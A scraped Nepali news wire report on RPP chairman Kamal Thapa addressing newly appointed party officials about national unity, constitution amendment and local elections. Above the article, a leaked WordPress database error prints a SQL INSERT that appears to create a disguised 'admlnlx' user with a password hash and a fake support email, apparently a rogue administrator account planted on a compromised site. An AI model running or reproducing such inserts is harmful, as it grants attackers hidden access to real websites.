WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrCLgIZ74u/v2vWv0XBwlrGqxjxw9q0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 19:45:46', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २९ –
राष्ट्रिय प्रजातन्त्र पार्टीका अध्यक्ष कमल थापाले मुलुकको राष्ट्रिय अखण्डता र एकतालाई केन्द्रमा राखेर सङ्गठन सुदृढीकरण गर्नुपर्ने बताउनुभएको छ ।
पार्टीका नवनियुक्त पदाधिकारीलाई पदबहाली गराउन आज केन्द्रीय कार्यालय धुम्बाराहीमा आयोजित कार्यक्रममा अध्यक्ष थापाले पदाधिकारीलाई मनोनयन पत्र हस्तान्तरण गर्दै देश र जनताको सेवालाई प्राथमिकतामा राखेर राजनीति तथा सामाजिक सेवा सञ्चालन गर्न आग्रह गर्नुभयो ।
उहाँले मुलुकमा विकसित पछिल्ला राजनीतिक घटनाक्रमले अहिले देशमा रहेका राजनीतिक शक्तिकाबीच नयाँ धु्रवीकरण बन्न सक्ने सम्भावना रहेको औँल्याउँदै संविधान संशोधनको विषय पेचिलो बन्दै गएको बताउनुभयो ।
अध्यक्ष थापाले राष्ट्रको प्राचीन मूल्य मान्यता तथा परम्परा र संस्कृतिको संरक्षणका लागि बलियो प्रजातान्त्रिक शक्तिको खाँचो रहेको बताउनुभयो ।
उहाँले स्थानीय निर्वाचनको सम्भावना बढेकाले पार्टीलाई बलियो शक्तिका रुपमा स्थापित गर्न गाउँगाउँमा पुगेर जनताको सेवामा लाग्न पदाधिकारीलाई निर्देशन दिनुभयो ।
सो पार्टीले मङ्गलबार २० सदस्यीय पदाधिकारी चयन गरेको पार्टीका सहायक प्रवक्ता राजाराम बर्तौलाले जानकारी दिनुभयो । – रासस